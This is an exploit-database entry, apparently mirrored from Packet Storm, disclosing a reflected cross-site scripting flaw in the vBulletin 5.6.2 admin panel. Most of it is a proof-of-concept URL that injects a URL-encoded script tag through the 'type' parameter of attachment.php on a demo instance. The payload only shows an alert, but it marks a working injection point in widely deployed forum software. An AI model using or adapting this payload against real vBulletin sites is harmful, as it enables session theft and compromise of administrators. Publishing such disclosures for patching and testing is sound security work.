Exploit for vBulletin 5.6.2 Cross Site Scripting

Name: Exploit for vBulletin 5.6.2 Cross Site Scripting
Rating: 5 (137 reviews)

2020-08-13 | CVSS 0.1

## https://sploitus.com/exploit?id=PACKETSTORM:158852
# Exploit Title: vBulletin 5.6.2 Cross Site Scripting  
# Date:12.08.2020  
# Author: Vincent666 ibn Winnie  
# Software Link: https://www.vbulletin.com/en/features/  
# Tested on: Windows 10  
# Web Browser: Mozilla Firefox  
# Blog : https://pentest-vincent.blogspot.com/  
# PoC: https://pentest-vincent.blogspot.com/2020/08/cross-site-scripting-in-vbulletin-ver.html  
  
So..  
  
We have a cross site scripting in the vBulletin 5.6.2  
  
PoC:  
  
I use demo admin panel for test.  
  
Our vuln link :  
  
https://6696f1715188-041313.demo.vbulletin.net/admincp/attachment.php&do=rebuild&type=[our xss is here]  
  
Full link with code:  
  
https://6696f1715188-041313.demo.vbulletin.net/admincp/attachment.php&do=rebuild&type=%22%22%3E%3Cscript%3Ealert(%22cross%20site%20scripting%20%22)%3C/script%3E  
  
Picture:  
  
https://imgur.com/a/OicFHyA